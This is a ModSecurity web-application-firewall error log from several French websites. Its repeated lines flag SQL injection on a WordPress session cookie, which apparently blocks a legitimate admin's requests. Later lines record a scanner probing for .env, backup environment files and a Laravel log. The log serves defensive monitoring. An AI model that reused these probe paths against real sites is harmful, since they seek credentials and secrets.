[unique_id "agI8P6FW67LJTsgN3jQNKgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:51.934271 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8P6FW67LJTsgN3jQNKgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:52.567898 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8P6FW67LJTsgN3jQNKgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:53.157272 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8QaFW67LJTsgN3jQNLQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:53.157721 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8QaFW67LJTsgN3jQNLQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:54.386840 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8QaFW67LJTsgN3jQNLQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:54.942692 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8QqFW67LJTsgN3jQNMQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:54.942968 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8QqFW67LJTsgN3jQNMQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:55.012411 2026] [security2:error] [pid 1588898:tid 1589210] [client 129.226.94.52:54930] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agI8Q6FW67LJTsgN3jQNMgAAABU"], referer: http://www.letamsgarage.fr
[Mon May 11 22:29:56.065834 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8QqFW67LJTsgN3jQNMQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:56.561950 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8RKFW67LJTsgN3jQNNwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:56.562231 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8RKFW67LJTsgN3jQNNwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:59.147470 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8RKFW67LJTsgN3jQNNwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:59.726538 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8R6FW67LJTsgN3jQNQQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:59.726829 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8R6FW67LJTsgN3jQNQQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:00.704885 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8R6FW67LJTsgN3jQNQQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:01.481438 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8SaFW67LJTsgN3jQNRAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:01.481734 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8SaFW67LJTsgN3jQNRAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:03.184844 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8SaFW67LJTsgN3jQNRAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:03.570590 2026] [security2:error] [pid 1605480:tid 1605527] [client 129.226.94.52:40194] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agI8Sx2Cvzd_nyNfUm8ASwAAAQU"], referer: https://www.letamsgarage.fr/
[Mon May 11 22:30:03.646837 2026] [security2:error] [pid 1588898:tid 1588908] [client 85.121.126.250:36302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agI8S6FW67LJTsgN3jQNRwAAAAk"]
[Mon May 11 22:30:03.647073 2026] [security2:error] [pid 1588898:tid 1588908] [client 85.121.126.250:36302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agI8S6FW67LJTsgN3jQNRwAAAAk"]
[Mon May 11 22:30:03.648575 2026] [security2:error] [pid 1601130:tid 1601151] [client 85.121.126.250:36262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.local"] [unique_id "agI8S3EgAO_835W6c1mXLQAAAEE"]
[Mon May 11 22:30:03.648745 2026] [security2:error] [pid 1601130:tid 1601151] [client 85.121.126.250:36262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.local"] [unique_id "agI8S3EgAO_835W6c1mXLQAAAEE"]
[Mon May 11 22:30:03.649595 2026] [security2:error] [pid 1606352:tid 1606420] [client 85.121.126.250:36326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/backend/.env"] [unique_id "agI8S3o_DFxNSZVmaX3SUAAAAME"]
[Mon May 11 22:30:03.649785 2026] [security2:error] [pid 1606352:tid 1606420] [client 85.121.126.250:36326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/backend/.env"] [unique_id "agI8S3o_DFxNSZVmaX3SUAAAAME"]
[Mon May 11 22:30:03.651129 2026] [security2:error] [pid 1534836:tid 1534885] [client 85.121.126.250:36240] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "ventes-privees-auto.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agI8S9eaRXe5lR8y0ZO2IwAAAU4"]
[Mon May 11 22:30:03.651705 2026] [security2:error] [pid 1534836:tid 1534885] [client 85.121.126.250:36240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agI8S9eaRXe5lR8y0ZO2IwAAAU4"]
[Mon May 11 22:30:03.655073 2026] [security2:error] [pid 1588898:tid 1588904] [client 85.121.126.250:36264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.development"] [unique_id "agI8S6FW67LJTsgN3jQNSAAAAAU"]
[Mon May 11 22:30:03.655261 2026] [security2:error] [pid 1588898:tid 1588904] [client 85.121.126.250:36264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.development"] [unique_id "agI8S6FW67LJTsgN3jQNSAAAAAU"]
[Mon May 11 22:30:03.656698 2026] [security2:error] [pid 1590352:tid 1590392] [client 85.121.126.250:36258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.example"] [unique_id "agI8S61q0G_aXAqWauT8YQAAAIA"]
[Mon May 11 22:30:03.660505 2026] [security2:error] [pid 1590352:tid 1590414] [client 85.121.126.250:36330] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agI8S61q0G_aXAqWauT8YAAAAJY"]
[Mon May 11 22:30:03.660759 2026] [security2:error] [pid 1590352:tid 1590414] [client 85.121.126.250:36330] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agI8S61q0G_aXAqWauT8YAAAAJY"]
[Mon May 11 22:30:03.662093 2026] [security2:error] [pid 1588898:tid 1588909] [client 85.121.126.250:36324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/admin/.env"] [unique_id "agI8S6FW67LJTsgN3jQNSQAAAAo"]
[Mon May 11 22:30:03.662306 2026] [security2:error] [pid 1588898:tid 1588909] [client 85.121.126.250:36324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/admin/.env"] [unique_id "agI8S6FW67LJTsgN3jQNSQAAAAo"]
[Mon May 11 22:30:03.662401 2026] [security2:error] [pid 1588898:tid 1588900] [client 85.121.126.250:36260] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.production"] [unique_id "agI8S6FW67LJTsgN3jQNSgAAAAA"]
[Mon May 11 22:30:03.662561 2026] [security2:error] [pid 1588898:tid 1588900] [client 85.121.126.250:36260] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.production"] [unique_id "agI8S6FW67LJTsgN3jQNSgAAAAA"]
